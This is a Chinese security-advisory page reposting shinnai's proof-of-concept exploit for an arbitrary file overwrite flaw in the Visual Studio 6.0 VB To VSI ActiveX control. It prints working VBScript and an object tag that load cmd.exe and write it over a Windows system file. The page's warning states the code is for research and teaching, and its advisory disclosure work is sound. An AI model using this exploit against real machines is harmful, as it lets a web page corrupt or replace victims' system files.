| 网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 |
![]() |
| Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道 |
涉及程序:
Microsoft Visual Studio
描述:
Microsoft Visual Studio VB To VSI支持库ActiveX控件任意文件覆盖漏洞
详细:
Microsoft Visual Studio是微软公司的开发工具套件系列产品,是一个基本完整的开发工具集,包括了软件整个生命周期中所需要的大部分工具。
Visual Studio中所安装的VB To VSI支持库(VBTOVSI.DLL)没有正确的验证某些方式的输入参数,允许用户使用Load()方式做为参数加载本地机器的文件,然后使用SaveAs()方式将其保存到任意位置。
<*来源:shinnai (shinnai@autistici.org)
*> 网管网www_bitscn_com
受影响系统:
Microsoft Visual Studio 6.0
攻击方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">---------------------------------------------------------------------------------------------------------
<b>Microsoft Visual Studio 6.0 VB To VSI Support Library (VBTOVSI.DLL v. 1.0.0.0) Arbitrary File Overwrite</b>
url: http://www.microsoft.com
网管网www.bitscn.com
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org 网管联盟bitsCN_com
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage. 中国网管论坛bbs.bitsCN.com
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 中国网管论坛bbs.bitsCN.com
<b>Description:
Using the "Load()" method we can load the content of a file from local machine passed as argument to
this function and then save it into arbitrary location with the "SaveAs()" method.
This allow to overwrite well known files with arbitrary data. I try to pass to the "Load()" method
remote directories (http) but, unfortunately, it accepts only local directories.</b>
--------------------------------------------------------------------------------------------------------- 网管下载dl.bitscn.com
<object classid='clsid:7EEA39E3-41D1-11D2-AB3B-00AA00BDD685' id='test'></object> 网管u家u.bitsCN.com
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> 网管u家u.bitscn@com
<script language = 'vbscript'>
Sub tryMe()
test.Load "c:\windows\system32\cmd.exe" 'or just some existing file
test.SaveAs "c:\windows\system_.ini"
MsgBox "Exploit completed!"
End Sub
</script>
</span></span>
中国网管论坛bbs.bitsCN.com
</code></pre>
解决方案:
厂商补丁: 网管u家u.bitsCN.com
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/
网管bitscn_com
|
0
|
评论加载中…